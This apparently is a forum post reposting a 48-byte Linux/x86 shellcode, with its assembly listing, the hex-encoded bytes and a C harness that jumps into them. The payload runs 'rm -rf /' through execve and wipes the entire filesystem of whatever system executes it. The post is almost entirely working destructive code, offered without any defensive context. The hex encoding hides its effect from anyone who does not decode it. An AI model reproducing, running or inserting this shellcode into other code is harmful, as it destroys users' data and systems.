发新话题
打印

linux/x86 execve(rm -rf /) shellcode 48 bytes

linux/x86 execve(rm -rf /) shellcode 48 bytes

复制内容到剪贴板
代码:
/* By Kris Katterjohn 8/31/2006
*
* 48 byte shellcode to execve("rm -rf /") for Linux/x86
*
*
*
* section .text
*
*    global _start
*
* _start:
*
* ; execve("/bin/rm", { "/bin/rm", "-r", "-f", "/", NULL }, NULL)
*
*    push byte 11
*    pop eax
*    xor esi, esi
*    push esi
*    push byte 0x2f
*    mov edi, esp
*    push esi
*    push word 0x662d
*    mov edx, esp
*    push esi
*    push word 0x722d
*    mov ecx, esp
*    push esi
*    push 0x6d722f2f
*    push 0x6e69622f
*    mov ebx, esp
*    push esi
*    push edi
*    push edx
*    push ecx
*    push ebx
*    mov ecx, esp
*    xor edx, edx
*    int 0x80
*/

main()
{
     char shellcode[] =
          "\x6a\x0b\x58\x31\xf6\x56\x6a\x2f\x89\xe7\x56\x66\x68\x2d\x66"
          "\x89\xe2\x56\x66\x68\x2d\x72\x89\xe1\x56\x68\x2f\x2f\x72\x6d"
          "\x68\x2f\x62\x69\x6e\x89\xe3\x56\x57\x52\x51\x53\x89\xe1\x31"
          "\xd2\xcd\x80";

     (*(void (*)()) shellcode)();
}

TOP

发新话题